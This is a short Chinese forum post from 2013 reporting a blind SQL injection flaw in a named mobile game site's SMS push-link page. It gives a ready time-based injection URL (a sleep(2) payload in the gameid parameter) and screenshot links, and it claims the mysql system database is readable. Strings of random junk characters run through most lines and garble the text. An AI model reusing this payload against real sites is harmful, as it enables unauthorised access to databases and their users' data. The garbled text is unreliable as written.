简要描述:
|9 m3 O0 p2 V# U( `' }2 U3 w0 A7 s) ]凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
- ^9 z6 I6 m6 |5 i0 b* k, O. Y8 W6 x+ i6 Q6 _
详细说明:! K, c" @5 V8 Z$ H# I; W
存在SQL盲注url:
6 o5 b% p1 Y' }# y8 z9 O% F( R8 ^5 yfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=18 J8 }9 y- m$ F- w6 [
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png0 K4 q* z2 K$ c4 E w7 E
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
. o1 F; u9 S) Mhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg* K% a6 N# J4 W2 D& D
2 U {& U/ t* N! d6 n, [
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对